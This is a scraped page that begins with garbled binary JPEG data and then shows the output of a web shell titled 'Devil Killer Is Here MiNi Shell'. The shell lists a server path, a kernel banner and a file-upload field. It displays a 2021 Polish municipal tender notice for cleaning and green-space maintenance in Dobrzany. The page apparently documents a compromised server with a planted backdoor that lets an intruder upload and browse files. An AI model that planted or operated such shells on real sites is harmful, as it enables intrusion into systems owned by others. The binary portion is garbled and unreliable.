JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211108/0026163301-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sprzątanie miasta Dobrzany i utrzymanie zieleni miejskiej w latach 2022-2023 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Dobrzany</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811685674</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Staszica 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dobrzany</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">73-130</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">915620202</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">915620204</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@dobrzany.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.dobrzany.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sprzątanie miasta Dobrzany i utrzymanie zieleni miejskiej w latach 2022-2023 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5afffe65-409a-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00261633</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003683/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Sprzątanie miasta Dobrzany i utrzymanie zieleni miejskiej w latach 2022-2023 </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://dobrzany.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem -<br/>Platformy Marketplanet znajdującej się pod adresem: https://dobrzany.ezamawiajacy.pl zwanej dalej<br/>Platformą. Szczegółowe informacje dotyczące przyjętego w postępowaniu sposobu komunikacji,<br/>znajdują się w SWZ.<br/>Uwaga! Przed przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać się z<br/>Instrukcją korzystania z Platformy zakupowej. Instrukcja została zamieszona także bezpośrednio na<br/>ww. Platformie.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Każdy<br/>Wykonawca może złożyć tylko jedną ofertę. Złożenie więcej niż jednej oferty spowoduje odrzucenie<br/>wszystkich ofert złożonych przez Wykonawcę.<br/>2. Oferta wraz z załącznikami musi zostać sporządzona w języku polskim.<br/>3. Zasady rejestracji na platformie:<br/>1) Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie<br/>https://dobrzany.ezamawiajacy.pl lub https://oneplace.marketplanet.pl Wykonawca po wybraniu opcji<br/>„przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie<br/>zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca<br/>zakłada konto wykonując kroki procesu rejestracyjnego: podaje adres e-mail, ustawia hasło, następnie<br/>powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”,<br/>2) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający<br/>zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w<br/>postaci elektronicznej,<br/>3) Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje o<br/>możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem<br/>telefonu podanym w ww. potwierdzeniu 4. Zasady przygotowania i złożenia oferty za pośrednictwem<br/>platformy:<br/>1) po założeniu konta Wykonawca ma możliwość złożenia oferty w postępowaniu. Komunikacja między<br/>Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje przekazywane są w formie elektronicznej za pośrednictwem Platformy w zakładce „Korespondencja z wykonawcami”. Za<br/>datę przekazania zawiadomień oraz informacji przyjmuje się ich datę wczytania do systemu,<br/>2) wyjaśnienia – wniosek o wyjaśnienie treści SWZ należy przesłać za pośrednictwem Platformy w<br/>zakładce „ZADAJ PYTANIE”,<br/>3) w celu zadania pytania Zamawiającemu, Wykonawca klika lewym przyciskiem myszy klawisz<br/>„ZADAJ PYTANIE”. Powoduje to otwarcie okna, w którym należy uzupełnić wszystkie dane<br/>Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym<br/>kodem weryfikującym z obrazka wykonawcy klika klawisz „POTWIERDŹ” Wykonawca uzyskuje<br/>potwierdzenie wysłania pytania poprzez komunikat systemowy „PYTANIE WYSŁANE”,<br/>4) treść pytań (bez ujawniania źródła zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu<br/>modyfikacji SWZ, Zamawiający przekaże Wykonawcom za pośrednictwem platformy,<br/>5) Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami<br/>korzystania z platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania<br/>teleinformatycznego platforma zakupowa tel. +48 22 576 22 23, e-mail:<br/>oneplace.admin@marketplanet.pl<br/>6) do upływu terminu składania ofert Wykonawca może zmienić lub wycofać ofertę. Sposób<br/>postępowania w przypadku zmiany lub wycofania oferty w systemie został opisany w Instrukcji<br/>korzystania z platformy</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny w zakresie RODO określa Rozdział<br/>II Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Ewentualne ograniczenia stosowania RODO zostały<br/>określone w Rozdziale II Specyfikacji Warunków Zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.27.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są usługi związane ze sprzątaniem i odśnieżaniem miasta Dobrzany<br/>oraz utrzymaniem zieleni miejskiej w latach 2022-2023.<br/>Zamówienie obejmuje następujący zakres usług:<br/>1. Sprzątanie miasta w okresie zimowym (za okres zimowy rozumie się czas od 01 listopada do końca lutego) polegające na wykonywaniu następujących prac:<br/>1) utrzymanie zimowe II standardu zgodnie z aktualnie obowiązującym Zarządzeniem Nr 46<br/>Ministra Transportu i Gospodarki Morskiej, wszystkich ulic miasta<br/>i chodników oraz placów przy Urzędzie Miejskim i OSP, placu targowego oraz terenu za<br/>budynkiem znajdującym się na targowisku, dworca autobusowego, parkingu przy ul.<br/>Stargardzkiej, parkingu przy ul. Spółdzielczej tj. między Orlikiem a siłownią zewnętrzną, placu<br/>przed budynkiem Nr 20 przy ul. Jana Pawła II, schodów przy ul. Armii Krajowej w Dobrzanach,<br/>przejścia między ul. Armii Krajowej a ul. Przechodnią.<br/>Uwaga: przez utrzymanie zimowe chodników rozumie się odśnieżanie i likwidację śliskości<br/>chodników do godziny 7:00, przy posesjach gminnych oraz<br/>w przestrzeniach oddzielonych pasami zielonymi od tych posesji. Odśnieżanie chodników nie<br/>może odbywać się sprzętem cięższym jak 1,5 tony.<br/>2) sprzątanie:<br/>1) codzienne sprzątanie pasa drogowego ulic: Jana Pawła II od ul. Staszica do<br/>ul. Dworcowej, Staszica od ul. Jana Pawła II do kościoła, placów przy Urzędzie Miejskim, placu<br/>targowego oraz terenu za budynkiem znajdującym się na targowisku, dworca autobusowego,<br/>parkingu przy ul. Stargardzkiej, parking przy ul. Spółdzielczej, tj. między Orlikiem a siłownią<br/>zewnętrzną, teren przy ul. Mickiewicza 1-3 (wokół pawilonu), placu przed budynkiem Nr 20 przy<br/>ul. Jana Pawła II,<br/>2) dwa razy w tygodniu pasa drogowego ulic: pozostałej części ulic Jana Pawła II, Staszica oraz<br/>ulic Mickiewicza, Szkolnej, Kościuszki, Stargardzkiej, Strażackiej,<br/>3) dwa razy w miesiącu do 15 i 30 dnia każdego miesiąca ulic: Cmentarnej, Dworcowej, Leśnej,<br/>Zacisze, Armii Krajowej, przejść między ul. Armii Krajowej a ul. Przechodnią, między ul. Armii<br/>Krajowej a ul. Podgórną, między ul. Ogrodową a ul. Pogodną, między ul. Pogodną a ul. Cichą,<br/>między ul. Cichą a ul. Spokojną,<br/>4) raz w miesiącu pozostałe ulice miasta.<br/>2. Sprzątanie pasa drogowego polegające na opróżnianiu i naprawianiu koszy ulicznych oraz<br/>sprzątaniu terenu wokół koszy (ok. 49 koszy na terenie całego miasta), sprzątaniu liści<br/>opadających z drzew w okresie jesiennym, w dniach od poniedziałku do soboty. Plac targowy<br/>należy sprzątać 5 dni w tygodniu.<br/>3. Sprzątanie miasta w okresie wiosenno-letnim od 01 marca do 31 października:<br/>1) codzienne sprzątanie pasa drogowego ulic: Jana Pawła II od ul. Staszica do ul. Dworcowej,<br/>Staszica od ul. Jana Pawła II do kościoła, placu przy budynku Urzędu, placu targowego oraz<br/>terenu za budynkiem znajdującym się na targowisku, dworca autobusowego, parkingu przy ul.<br/>Stargardzkiej, parkingu przy ul. Spółdzielczej, tj. między Orlikiem a siłownią zewnętrzną, terenu<br/>przy ul. Mickiewicza 1-3 (wokół pawilonu), placu przed budynkiem Nr 20 przy ul. Jana Pawła II,<br/>2) dwa razy w tygodniu pasa drogowego ulic: pozostałej części ulic Jana Pawła II, Staszica oraz<br/>ulic Mickiewicza, Szkolnej, Kościuszki, Stargardzkiej, Strażackiej,<br/>3) dwa razy w miesiącu do 15 i 30 dnia każdego miesiąca ulic: Cmentarnej, Dworcowej, Leśnej,<br/>Zacisze, Armii Krajowej,<br/>4) dwa razy w miesiącu pozostałe ulice miasta oraz schodów od ul. Armii Krajowej do ul.<br/>Staszica za budynkami 11-19 i 25-37, przejście między ul. Armii Krajowej a ul. Przechodnią,<br/>między ul. Armii Krajowej a ul. Podgórną, między ul. Ogrodową a ul. Pogodną, między ul.<br/>Pogodną a ul. Cichą, między ul. Cichą a ul. Spokojną,<br/>5) dwa razy w miesiącu zamiatanie wszystkich ulic zamiatarką.<br/>Sprzątanie pasa drogowego będzie polegało na zbieraniu śmieci, zamiataniu, opróżnianiu i<br/>naprawie koszy ulicznych, sprzątaniu terenu wokół koszy (ok. 49 koszy na terenie całego<br/>miasta), odchwaszczaniu placu przed budynkiem Nr 20 przy ul. Jana Pawła II, placu przy<br/>budynku Urzędu Miejskiego oraz parkingu za tym Urzędem, sprzątaniu liści opadających z<br/>drzew w okresie jesiennym, w dniach od poniedziałku do soboty, sprzątaniu parków i placów po<br/>imprezach organizowanych przez gminę (Dni Dobrzan, majówka, dożynki itp.). Plac targowy<br/>oraz teren za budynkiem znajdującym się na targowisku należy sprzątać 5 dni w tygodniu.<br/>4. Mechaniczne odchwaszczanie ciągów pieszych, parkingów i placów, przestrzeni między<br/>ulicami a chodnikami.<br/>5. Stabilizowanie małej architektury infrastruktury.<br/>6. Uzupełnianie ubytków ciągów pieszych i komunikacyjnych oraz przejść.<br/>7. Podcinanie gałęzi krzewów i małych drzewek wchodzących w światło przejść, schodów itp.<br/>8. Wszystkie powstałe odpady, należy zbierać w sposób selektywny i pozbywać się zgodnie z<br/>obowiązującymi przepisami we własnym zakresie. Zamawiający zastrzega sobie prawo do<br/>wglądu w karty przekazania odpadów.<br/>9. Utrzymanie ciągów zieleni miejskiej w okresie wiosenno-letnim od 01 maja<br/>do 30 września. Utrzymanie ciągów zieleni miejskiej w okresie wiosenno-letnim, będzie polegało<br/>na wykonywaniu następujących prac:<br/>1) koszenie traw i chwastów zgodnie z harmonogramem ustalonym w porozumieniu z<br/>pracownikiem ds. gospodarki komunalnej Urzędu Miejskiego dwa razy w miesiącu. Dotyczy<br/>obszaru:<br/>a) dwóch parków: P1 (Park Miejski) i P2 (park przy ul. Dworcowej),<br/>b) placu zabaw przy ul. Ogrodowej,<br/>c) placu za Urzędem Miejskim,<br/>d) placu zieleni wokół budynku przystanku autobusowego przy ul. Staszica,<br/>e) placu zieleni za przystankiem autobusowym do bloku przy ul. Staszica 20-28,<br/>f) placu zieleni między ul. Staszica a budynkiem sklepu Stokrotka,<br/>g) placu zieleni przy ul. Mickiewicza 1-3 (wokół pawilonu),<br/>h) placu zieleni przy ul. Jana Pawła II (naprzeciw budynku remizy strażackiej),<br/>i) placu zieleni wokół ul. Jana Pawła II przy mostku,<br/>j) placu zieleni wokół budynku OSP (dz. nr 39/17),<br/>k) placu zieleni przy parkingu Orlika,<br/>l) placów zieleni przy ul. Szkolnej, Spółdzielczej,<br/>m) skarpy przy ul. Kościuszki – od ogrodzenia cmentarza do drogi (dz. nr 197),<br/>n) placu przy cmentarzu przy ul. Dworcowej (dz. nr 227) – od ul. Jana Pawła II do skrzyżowania<br/>z ul. Kościuszki, terenu po torowisku,<br/>o) skarpy od ogrodzenia cmentarza przy ul. Cmentarnej od strony ul. Dworcowej do drogi,<br/>p) wszystkich ulic w obrębie miasta, Kościuszki (za zakładem budowalnym),<br/>q) teren skarpy i drogi od ul. Staszica wzdłuż ul. Radosnej do końca działki 349/1,<br/>r) teren skarpy przy ul. Armii Krajowej,<br/>s) skwery - ul. Długa – Staszica,<br/>t) przejścia między ul. Armii Krajowej a ul. Przechodnią, między ul. Armii Krajowej a ul.<br/>Podgórną, między ul. Ogrodową a ul. Pogodną, między ul. Pogodną a ul. Cichą, między ul. Cichą<br/>a ul. Spokojną,<br/>u) skwer wzdłuż ul. Jana Pawła II - przed byłym POM-em,<br/>2) koszenie traw i chwastów obejmuje również pobocza należące do pasa drogowego,<br/>odchwaszczanie placu przed budynkiem Nr 20 przy ul. Jana Pawła II, placu przy budynku<br/>Urzędu Miejskiego oraz parkingu za tym Urzędem.<br/>10. Skoszoną trawę należy zgrabić i wywieźć natychmiast po skoszeniu. W kwietniu zamiast<br/>koszenia, wyżej wymienione ciągi zieleni, należy wygrabić i wywieźć wygrabioną trawę i liście.<br/>11. Utrzymywanie czystości dróg nieutwardzonych do momentu wykonania ich nawierzchni<br/>będzie polegało na zbieraniu śmieci, w okresie zimowym na odśnieżaniu, natomiast w okresie<br/>letnim na wykaszaniu traw i chwastów raz w miesiącu.<br/>12. W myśl ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2021 r. poz. 779 ze zm.)<br/>Wykonawca jest wytwórcą odpadów zielonych powstałych w związku z jego działalnością i<br/>winien je zagospodarować zgodnie z powołaną ustawą. Odpady zielone muszą być uprzątnięte<br/>maksymalnie w ciągu 24 godzin od momentu wytworzenia.<br/>13. Dekorowanie i flagowanie ulic, placów z okazji świąt państwowych i regionalnych takich jak:<br/>1, 2 i 3 maja, 11 listopada, Dni Dobrzan, Dożynki. Zamawiający przewiduje możliwość<br/>dekorowania i flagowania podczas innych niż wymienione wyżej maksymalnie 2 świąt - w<br/>przypadku pojawiania się takiej konieczności.<br/>14. Utrzymanie znaków drogowych pionowych i poziomych na terenie miasta, w tym malowanie,<br/>czyszczenie, naprawa, konserwacja, wymiana zniszczonych na nowe – do 3 znaków rocznie na koszt Wykonawcy – przedstawione w sprawozdaniu rocznym.<br/>15. Wykonawca przed złożeniem oferty powinien zapoznać się z rejonem planowanych usług w<br/>szczególności ilością i długością ulic a także powierzchnią parków i placów.<br/>16. Wykaz ilości koszy, znaków drogowych oraz ulic objętych przedmiotem zamówienia wg<br/>SWZ.17. Wykonawca przed podpisaniem umowy zobowiązany jest sporządzić i przedstawić<br/>Zamawiającemu do akceptacji harmonogram prac na cały rok kalendarzowy uwzględniający<br/>zakres przedmiotu zamówienia z dokładnością co do dnia (tj. np. zamiatanie ulic w marcu 2022<br/>r. nastąpi w dniach 11 i 25). Harmonogram na kolejny rok Wykonawca będzie przedstawiał<br/>Zamawiającemu do akceptacji do 15 grudnia roku objętego zamówieniem, na rok następny.<br/>18. Prace składające się na przedmiot zamówienia należy wykonywać z należytą starannością,<br/>zgodnie ze sztuką i przepisami prawa oraz zasadami współczesnej wiedzy i uzgodnieniami<br/>dokonanymi w trakcie realizacji prac. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90610000-6 - Usługi sprzątania i zamiatania ulic</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">77310000-6 - Usługi sadzenia roślin oraz utrzymania terenów zielonych</p> <p class="mb-0">77312000-0 - Usługi usuwania chwastów</p> <p class="mb-0">77313000-7 - Usługi utrzymania parków</p> <p class="mb-0">77314100-5 - Usługi w zakresie trawników</p> <p class="mb-0">77342000-9 - Przycinanie żywopłotów</p> <p class="mb-0">90511300-5 - Usługi zbierania śmieci</p> <p class="mb-0">90610000-6 - Usługi sprzątania i zamiatania ulic</p> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta przedstawiająca<br/>najkorzystniejszy bilans ceny oraz pozostałych kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji na zgłoszenia likwidacji skutków zdarzeń losowych (od momentu zgłoszenia przez Zamawiającego do momentu przystąpienia do usunięcia nieprawidłowości)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/><br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki 